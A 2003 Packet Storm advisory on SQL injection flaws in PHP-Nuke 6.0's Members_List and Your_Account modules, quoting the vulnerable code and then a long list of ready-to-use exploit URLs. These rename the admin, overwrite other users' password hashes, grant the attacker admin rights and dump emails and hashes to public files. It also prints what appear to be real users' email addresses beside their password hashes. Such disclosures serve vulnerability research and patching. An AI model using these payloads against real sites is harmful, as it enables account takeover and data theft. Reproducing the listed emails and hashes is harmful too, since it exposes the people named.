phpnuke60.txt

2003-03-10T00:00:00
ID PACKETSTORM:30884
Type packetstorm
Reporter Frog Man
Modified 2003-03-10T00:00:00

Description

                                        
                                            `  
Informations :  
°°°°°°°°°°°°°°  
Language : PHP  
Website : http://www.phpnuke.org  
Versions : 6.0 (& 6.5?)  
Modules : Members_List, Your_Account  
Problem : SQL Injection  
PHP Configuration : This will work if magic_quotes_gpc=OFF.  
  
  
PHP Code/Location :  
°°°°°°°°°°°°°°°°°°°  
/modules/Members_List/index.php :  
  
------------------------------------------------------------------------  
[...]  
$count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";  
$select = "select uid, name, uname, femail, url from   
".$user_prefix."_users ";  
$where = "where uname != 'Anonymous' ";  
  
if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {  
$where .= "AND uname like '".$letter."%' ";  
  
} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {  
$where .= "AND uname REGEXP \"^\[1-9]\" ";  
  
} else {  
$where .= "";  
}  
$sort = "order by $sortby";  
$limit = " ASC LIMIT ".$min.", ".$max;  
  
$count_result = sql_query($count.$where, $dbi);  
$num_rows_per_order = mysql_result($count_result,0,0);  
  
$result = sql_query($select.$where.$sort.$limit, $dbi) or die();  
  
  
echo "<br>";  
if ( $letter != "front" ) {  
echo "<table width=\"100%\" border=\"0\"   
cellspacing=\"1\"><tr>\n";  
echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font   
color=\"$textcolor2\"><b>"._NICKNAME."</b></font></td>\n";  
echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font   
color=\"$textcolor2\"><b>"._REALNAME."</b></font></td>\n";  
echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font   
color=\"$textcolor2\"><b>"._EMAIL."</b></font></td>\n";  
echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font   
color=\"$textcolor2\"><b>"._URL."</b></font></td>\n";  
$cols = 4;  
[...]  
------------------------------------------------------------------------  
  
  
/modules/Your_Account/index.php :  
------------------------------------------------------------------------  
switch($op) {  
[...]  
case "mailpasswd":  
mail_password($uname, $code);  
break;  
  
case "userinfo":  
userinfo($uname, $bypass, $hid, $url);  
break;  
  
case "login":  
login($uname, $pass);  
break;  
[...]  
case "saveuser":  
saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass,   
$bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,   
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);  
break;  
[...]  
case "savehome":  
savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,   
$popmeson);  
break;  
  
case "savetheme":  
savetheme($uid, $theme);  
break;  
[...]  
case "savecomm":  
savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);  
break;  
[...]  
}  
------------------------------------------------------------------------  
  
  
/modules/Your_Account/index.php :  
------------------------------------------------------------------------  
[...]  
function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass,   
$vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,   
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {  
global $user, $cookie, $userinfo, $EditedMessage, $user_prefix, $dbi,   
$module_name;  
cookiedecode($user);  
$check = $cookie[1];  
$check2 = $cookie[2];  
$result = sql_query("select uid, pass from ".$user_prefix."_users where   
uname='$check'", $dbi);  
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);  
if (($uid == $vuid) AND ($check2 == $ccpass)) {  
if (!eregi("http://", $url)) {  
$url = "http://$url";  
}  
if ((isset($pass)) && ("$pass" != "$vpass")) {  
echo "<center>"._PASSDIFFERENT."</center>";  
} elseif (($pass != "") && (strlen($pass) < $minpass)) {  
echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b>   
"._CHARLONG."</center>";  
} else {  
if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio =   
FixQuotes($bio); }  
if ($pass != "") {  
cookiedecode($user);  
sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);  
$pass = md5($pass);  
sql_query("update ".$user_prefix."_users set name='$realname',   
email='$email', femail='$femail', url='$url', pass='$pass', bio='$bio' ,   
user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ',   
user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig',   
user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm',   
newsletter='$newsletter' where uid='$uid'", $dbi);  
$result = sql_query("select uid, uname, pass, storynum, umode, uorder,   
thold, noscore, ublockon, theme from ".$user_prefix."_users where   
uname='$uname' and pass='$pass'", $dbi);  
if(sql_num_rows($result, $dbi)==1) {  
$userinfo = sql_fetch_array($result, $dbi);  
  
docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);  
} else {  
echo "<center>"._SOMETHINGWRONG."</center><br>";  
}  
sql_query("UNLOCK TABLES", $dbi);  
} else {  
sql_query("update ".$user_prefix."_users set name='$realname',   
email='$email', femail='$femail', url='$url', bio='$bio',   
user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ',   
user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig',   
user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm',   
newsletter='$newsletter' where uid='$uid'", $dbi);  
if ($attach) {  
$a = 1;  
} else {  
$a = 0;  
}  
}  
Header("Location: modules.php?name=$module_name");  
}  
}  
}  
[...]  
function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,   
$popmeson) {  
global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;  
cookiedecode($user);  
$check = $cookie[1];  
$check2 = $cookie[2];  
$result = sql_query("select uid, pass from ".$user_prefix."_users where   
uname='$check'", $dbi);  
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);  
if (($uid == $vuid) AND ($check2 == $ccpass)) {  
if(isset($ublockon)) $ublockon=1; else $ublockon=0;  
$ublock = FixQuotes($ublock);  
sql_query("update ".$user_prefix."_users set storynum='$storynum',   
ublockon='$ublockon', ublock='$ublock', broadcast='$broadcast',   
popmeson='$popmeson' where uid='$uid'", $dbi);  
getusrinfo($user);  
docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);  
Header("Location: modules.php?name=$module_name");  
}  
}  
  
function savetheme($uid, $theme) {  
global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;  
cookiedecode($user);  
$check = $cookie[1];  
$check2 = $cookie[2];  
$result = sql_query("select uid, pass from ".$user_prefix."_users where   
uname='$check'", $dbi);  
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);  
if (($uid == $vuid) AND ($check2 == $ccpass)) {  
sql_query("update ".$user_prefix."_users set theme='$theme' where   
uid='$uid'", $dbi);  
getusrinfo($user);  
docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);  
Header("Location: modules.php?name=$module_name&theme=$theme");  
}  
}  
[...]  
function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore,   
$commentmax) {  
global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;  
cookiedecode($user);  
$check = $cookie[1];  
$check2 = $cookie[2];  
$result = sql_query("select uid, pass from ".$user_prefix."_users where   
uname='$check'", $dbi);  
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);  
if (($uid == $vuid) AND ($check2 == $ccpass)) {  
if(isset($noscore)) $noscore=1; else $noscore=0;  
sql_query("update ".$user_prefix."_users set umode='$umode',   
uorder='$uorder', thold='$thold', noscore='$noscore',   
commentmax='$commentmax' where uid='$uid'", $dbi);  
getusrinfo($user);  
docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);  
Header("Location: modules.php?name=$module_name");  
}  
}  
[...]  
------------------------------------------------------------------------  
  
  
  
/modules/Your_Account/index.php :  
------------------------------------------------------------------------  
[...]  
function mail_password($uname, $code) {  
global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi,   
$module_name;  
$result = sql_query("select email, pass from ".$user_prefix."_users   
where (uname='$uname')", $dbi);  
if(!$result) {  
include("header.php");  
OpenTable();  
echo "<center>"._SORRYNOUSERINFO."</center>";  
CloseTable();  
include("footer.php");  
[...]  
------------------------------------------------------------------------  
  
  
------------------------------------------------------------------------  
[...]  
function userinfo($uname, $bypass=0, $hid=0, $url=0) {  
global $user, $cookie, $sitename, $prefix, $user_prefix, $dbi, $admin,   
$broadcast_msg, $my_headlines, $module_name;  
$result = sql_query("select uid, femail, url, bio, user_avatar,   
user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest,   
user_sig, pass, newsletter from ".$user_prefix."_users where   
uname='$uname'", $dbi);  
$userinfo = sql_fetch_array($result, $dbi);  
[...]  
------------------------------------------------------------------------  
  
  
  
------------------------------------------------------------------------  
[...]  
function login($uname, $pass) {  
global $setinfo, $user_prefix, $dbi, $module_name;  
$result = sql_query("select pass, uid, storynum, umode, uorder, thold,   
noscore, ublockon, theme, commentmax from ".$user_prefix."_users where   
uname='$uname'", $dbi);  
$setinfo = sql_fetch_array($result, $dbi);  
[...]  
}  
[...]  
------------------------------------------------------------------------  
  
  
  
  
Exploits :  
°°°°°°°°°°  
Members_List :  
- Show users (order by crypted pass) :  
http://[target]/modules.php?name=Members_List&letter=All&sortby=pass  
  
- Show users (order by UID) :  
http://[target]/modules.php?name=Members_List&letter=All&sortby=uid  
  
- Show moderators :  
http://[target]/modules.php?name=Members_List&letter='%20OR%20user_level='2'/*  
  
- Show administrators :  
http://[target]/modules.php?name=Members_List&letter='%20OR%20user_level='4'/*  
  
- Show all users having a crypted pass beginning with 'abc' :  
http://[target]/modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'abc%25'/*  
  
- Etc...  
  
  
Your_Account :  
- Change the name of 'Admin' user into "hophophop" :  
  
http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',name='Hophophop'%20where%20uname='Admin'/*&uid=[OUR_UID]  
  
- Change the Bob's password INTO md5_decrypted   
'd41d8cd98f00b204e9800998ecf8427e' :  
  
http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]  
or :  
http://[target]/modules.php?name=Your_Account&op=saveuser&realname=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]  
or :  
http://[target]/modules.php?name=Your_Account&op=saveuser&email=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]  
or :  
http://[target]/modules.php?name=Your_Account&op=savehome&storynum=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]  
or :  
http://[target]/modules.php?name=Your_Account&op=savehome&ublockon=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]  
or :  
http://[target]/modules.php?name=Your_Account&op=savecomm&umode=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]  
or :  
http://[target]/modules.php?name=Your_Account&op=savecomm&thold=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]  
  
  
or...or... and or again :p  
  
  
- Change our own user account level into admin level :  
http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',user_level='4&uid=[OUR_UID]  
or :  
http://[target]/modules.php?name=Your_Account&op=saveuser&femail=',user_level='4&uid=[OUR_UID]  
or :  
http://[target]/modules.php?name=Your_Account&op=saveuser&url=http://',user_level='4&uid=[OUR_UID]  
or :  
http://[target]/modules.php?name=Your_Account&op=savehome&broadcast=',user_level='4&uid=[OUR_UID]  
or :  
http://[target]/modules.php?name=Your_Account&op=savecomm&uorder=',user_level='4&uid=[OUR_UID]  
or etc...  
  
  
  
  
- Save all users' email & crypted password into   
http://[target]/AllMailPass.txt :  
  
http://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=')%20OR%201=1%20INTO%20OUTFILE%20'/[path/to/site]/AllMailPass.txt'/*  
  
It will give in http://[target]/AllMailPass.txt anything like :  
--------------------------------------------------------  
chaeyut@yahoo.com a34e83e6658923ceb100abb52cd31df6  
for-ever@yahoo.com 5728cea4924d9097c78d08165ad1dd8a  
runbur@netzero.com 546fa9501a436d4615b798f856386ba8  
venom@yahoo.com 614edfbc874f09d75b98240295a8f39f  
gotchakd@yahoo.de fbd125e74581979d2b7fc6e2b360e286  
cfischer@mindspring.com 9407c826d8e3c07ad37cb2d13d1cb641  
mike@xiradio.com f9ac6b05beccb0fc5837b6a7fef4c1d3  
mikdif@yahoo.com 6106edf3e22b0cd8609fa1112d0ae962  
mcurry@hotmail.com 739897be3e14cf5a9fb032069f522b77  
--------------------------------------------------------  
  
(crypted password can be sent by cookie to access to the account).  
  
  
- Save the informations about users wich have an uid between 190 and 196   
into http://[target]/1.txt :  
  
http://[target]/modules.php?name=Your_Account&op=userinfo&uname='%20OR%20uid>190%20AND%20uid<196%20INTO%20OUTFILE%20'/[path/to/site]/1.txt  
  
  
  
- Save all informations about admins, moderators,... into   
http://[target]/admintxt :  
  
http://[target]/modules.php?name=Your_Account&op=login&uname='%20OR%user_level>1%20INTO%20OUTFILE%20'/[path/to/site]/admin.txt  
  
  
  
etc etc ... !  
  
  
[path/to/site] can be found (for example) on   
http://[target]/modules/Forums/bb_smilies.php (Path Disclosure Security   
Hole).  
  
  
Solution :  
°°°°°°°°°°  
A patch has been created and published on http://www.phpsecure.info .  
  
  
More Details :  
°°°°°°°°°°°°°°  
In French :  
http://www.frog-man.org/tutos/PHP-Nuke6.0-Members_List-Your_Account.txt  
  
Translated by Google :  
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHP-Nuke6.0-Members_List-Your_Account.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools  
  
  
  
Credits :  
°°°°°°°°°  
Greetz to T. Rodriguez, [RaFa], Webotheque.be  
Author : frog-m@n  
http://www.phpsecure.info .  
  
  
_________________________________________________________________  
Utilisez votre MSN Messenger via votre GSM !   
http://www.fr.msn.be/gsm/servicesms/messengerparsms  
  
`